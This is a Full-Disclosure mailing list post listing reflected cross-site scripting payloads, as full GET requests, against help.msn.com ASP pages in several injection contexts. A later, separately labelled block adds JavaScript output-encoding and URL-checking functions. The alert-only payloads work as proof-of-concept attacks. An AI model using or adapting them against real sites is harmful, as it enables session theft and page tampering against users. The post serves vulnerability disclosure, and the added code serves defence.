This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
http://help.msn.com/en_au/DirectedHelpControls.asp
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.3 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
3 Cross site scripting (Standard variants)
http://help.msn.com/en_au/DirectedHelpControls.asp
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4 Cross site scripting using HTML entities
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
5 Cross site scripting using HTML entities
http://help.msn.com/en_au/DirectedHelpControls.asp
 
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
http://help.msn.com/en_au/directedhelp.asp
 
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnick's), some nematode <http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.
 
<!--# Greets:
 Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
 
 
 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
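
The contexts named in the post (JavaScript string, HTML markup, quoted attribute without angle brackets, entity-encoded URL scheme) each call for a different output encoding or validation step. The sketch below is an added example, not part of the original post and not MSN's code; the sink templates, function names and sample strings are constructed assumptions.

```javascript
// Added illustration; the templates and function names are assumptions, not MSN's code.

// HTML text and quoted-attribute context: encode the five significant characters.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g,
    (c) => "&#x" + c.charCodeAt(0).toString(16) + ";");
}

// JavaScript string-literal context: everything outside a small safe set becomes
// \uXXXX, so quotes, backslashes, "<" and line breaks cannot end the literal.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// URL context (e.g. ContactUsURL): accept only absolute http/https URLs.
// An entity-encoded "javascript:" scheme fails to parse and is rejected.
function safeHttpUrl(value) {
  try {
    const u = new URL(String(value));
    return (u.protocol === "http:" || u.protocol === "https:") ? u.href : null;
  } catch (e) {
    return null;
  }
}

// Identifier-like parameters (DataMarket, ITSFile, v4Var): allow-list the shape
// so anything outside letters, digits, "_" and "." is refused up front.
function isIdentifier(value) {
  return /^[A-Za-z0-9_.]{1,64}$/.test(String(value));
}

// Hypothetical sinks corresponding to the contexts named in the post.
function renderInScript(value) {
  return "var sMarket = '" + encodeJsString(value) + "';";
}
function renderInAttribute(value) {
  return '<input name="H_APP" value="' + encodeHtml(value) + '">';
}

// Constructed inputs with the same shape as the decoded request parameters.
const samples = {
  jsContext: "'+alert('x')+'",
  tagInjection: ">\"'><img src=\"javascript:alert('x')\">",
  noAngleBrackets: "\" style=\"background:url(javascript:alert('x'))\" OA=\"",
  entityScheme: "&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(1)",
};
```

HTML encoding alone is not enough for the script sink: entities are not decoded inside a script block and a trailing backslash would still escape the closing quote, which is why the JavaScript context gets its own encoder.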